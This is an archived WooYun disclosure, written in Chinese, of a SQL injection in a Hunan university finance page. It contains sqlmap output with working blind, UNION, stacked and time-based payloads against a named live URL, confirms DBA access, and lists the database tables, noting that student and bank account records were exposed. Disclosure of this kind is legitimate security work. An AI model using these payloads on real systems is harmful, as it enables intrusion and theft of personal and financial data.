乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-13: 细节已通知厂商并且等待厂商处理中 2015-01-18: 厂商已经主动忽略漏洞,细节向公众公开
‘sa’权限不忍直视了。学生信息,和银行账号信息都有啊!!(-__-)
页面:http://cwc.hnust.cn/pay/getpass.asp
加个' 提交 ,出错了
抓包:
提交的数据可以看到了。直接sqlmap。
Parameter: username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=1212020202' AND 7443=7443 AND 'yDal'='yDal Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: username=-9863' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(87)+CHAR(97)+CHAR(119)+CHAR(82)+CHAR(87)+CHAR(69)+CHAR(104)+CHAR(122)+CHAR(73)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113),NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: username=1212020202'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: username=1212020202' WAITFOR DELAY '0:0:5'-----[03:48:13] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[03:48:13] [INFO] testing if current user is DBAcurrent user is DBA: True[03:48:13] [WARNING] HTTP error codes detected during run:404 (Not Found) - 1 times[03:48:13] [INFO] fetched data logged to text files under 'C:\Users\ERIC\.sqlmap\output\cwc.hnust.cn'
还是dba
[03:53:04] [INFO] testing if current user is DBAcurrent user is DBA: True
再看了下有多少库
随便找个库就有 250个表了
Database: xssf5[246 tables]+--------------------+| DM_UF_MX || DM_UF_MX || FS_RECORD || LX_DM || LX_SFB1 || LX_SFB1 || LX_SFMX || PBJDM || PBJSFBZ || PBMDM || PCXKC || PDJBH || PDKLX || PDWDY || PDWLXDM || PDWSJX || PEXPORT_LM || PEXPORT_LM || PFSSFXM || PFXDM || PGNDM || PGSDY || PIMPORT_LM || PIMPORT_LM || PJSFSDM || PJ_LYB || PJ_MXB || PKCDM || PMKDM || PMZDM || PQUERY_FIELD_TMP || PQUERY_FIELD_TMP || PQUERY_FIELD_TMP || PQUERY_TABLE || PQUERY_TJ || PQUERY_TMP || PQXDM_FX || PQXDM_FX || PSCWJDY || PSFQJDZ || PSFQJDZ || PSFXMLX || PSFXMLX || PSFYXJ || PTXXX || PXQDM || PXSDM_BAK || PXSDM_BAK || PXSLB || PXSLY || PXSSFBZ_MX || PXSSFBZ_MX || PXSTZ_MX || PXSXZ || PXSZT || PXTCS || PXXXX || PYHCWDM || PYHDM || PYHSSZ || PYHZDM || PYSKZY || PYYDM || PZBLM || PZCBZB || PZJLB || PZYDM || PZYLXDM || SF_BBDY_MX || SF_BBDY_MX || SF_CESFDB || SF_CESFDMX || SF_CXFB || SF_CXFMX || SF_DJGL || SF_HJDB_DEL || SF_HJDB_DEL || SF_HJDMX_DEL || SF_HJDMX_DEL || SF_JMDB_BAK || SF_JMDB_BAK || SF_JMDB_DEL || SF_JMDMX_BAK || SF_JMDMX_BAK || SF_JMDMX_DEL || SF_LOG || SF_PZMB1 || SF_PZMB1 || SF_PZMBGS || SF_PZMBMX || SF_QYB || SF_SFDB_BAK || SF_SFDB_BAK || SF_SFDB_DEL || SF_SFDB_RY || SF_SFDDC || SF_SFDMX_BAK || SF_SFDMX_BAK || SF_SFDMX_DEL || SF_SFDMX_DY || SF_SFDMX_RY || SF_SFDY_LOG || SF_SFD_DY || SF_SFD_FP || SF_SSDK_PL || SF_SSDK_PL || SF_SSDK_QY || SF_SS_YH || SF_TFDB_BAK || SF_TFDB_BAK || SF_TFDB_DEL || SF_TFDDC || SF_TFDMX_BAK || SF_TFDMX_BAK || SF_TFDMX_DEL || SF_TFD_FP || SF_XESFDB || SF_XESFDMX || SF_XXDL || SF_YHDS_LSH || SF_YHDS_TKB || SF_YHDS_XF || SF_YSKBZ || SF_YSKTZ_MX_BAK || SF_YSKTZ_MX_BAK || SF_YSK_BAK || SF_YSK_BAK || SF_YSK_CD || SF_YSK_DK || SF_YSK_FP || SF_YSK_TMP || SF_ZXDKBZ || SF_ZZ_BAK || SF_ZZ_BAK || T_zs_ylpos_tmp || T_zs_ylpos_tmp || V_CXFXS || V_CXMXZ || V_HJMXZ || V_JMD || V_JMDXS || V_JMLXMXZ || V_JMLXXS || V_JMMXZ_LS || V_JMMXZ_LS || V_SFD || V_SFDXS || V_SFLXMXZ_LS || V_SFLXMXZ_LS || V_SFLXXS || V_SFLXZZ || V_SFLXZZXS || V_SFMXZ_LS || V_SFMXZ_LS || V_SFZZ || V_SFZZXS || V_TABLE || V_TFD || V_TFDXS || V_TFLXMXZ || V_TFLXXS || V_TFMXZ_LS || V_TFMXZ_LS || V_XESFLXMXZ || V_XESFMXZ || V_XSDM || V_YSKLX || V_YSKLX || V_YSKLXXS || V_YSKXS || V_jfxxb || WY_SSDK || XF_XFGL_TMP || XF_XFGL_TMP || ckd_xyp || dtproperties || gs_table || nfsf2_bjdmzs || nfsf2_pjnmb || nfsf2_plog || nfsf2_pxtcs || nfsf2_vzz || nfsf2_xsdmzs || nfsf_vsfzz || pjgl_glb || pjgl_lyb || pjgl_mxb || seed || sf_jks_temp || sf_jsfsb || sf_jzhj || sf_pkyh || sf_poslog || sf_qfqk_htemp1 || sf_sgpjzhj || sf_sqltj || sf_xtrz || sf_yhpk_ls || sf_yhpk_mx || sf_yhpk_temp || sf_yhyjfk || sysconstraints || syssegments || sysxszdkz || t_zs_czwh || t_zs_dlyhwh || t_zs_dtwh || t_zs_dwdz || t_zs_dwpjgj || t_zs_dwxmgj || t_zs_ggb || t_zs_jzhjxx || t_zs_pjkpxx || t_zs_pjls_tmp || t_zs_pjls_tmp || t_zs_pjwh || t_zs_pjzl || t_zs_srlb || t_zs_xmxx || t_zs_ypsq || t_zs_zgwh || t_zs_zsdw || temp_bmbjxztjb_xyp || temp_bmjfqkb_xyp || temp_bmrshzb_xyp || temp_sfqkzhtjb_xyp || temp_xsysfhzb_xyp || tmp_jq || txs13 || tzf14 || tzj14 || tzs || v_cxfzz || wy_bank || wy_bwjg || wy_bwlx || wy_bwlxzddy || wy_fs || wy_js || wy_pagid || wy_xxdl || wy_yh_xtcs || xe_mxz || xe_sfzz || xe_zh || 客户编号+--------------------+
由于表名都是拼音缩写不好辨认,就随便试了几张表学号 银行账号姓名...数量很大,从05年到现在几乎都有
脱裤的就不感兴趣了~,走人!
过滤。
危害等级:无影响厂商忽略
忽略时间:2015-01-18 14:50
暂无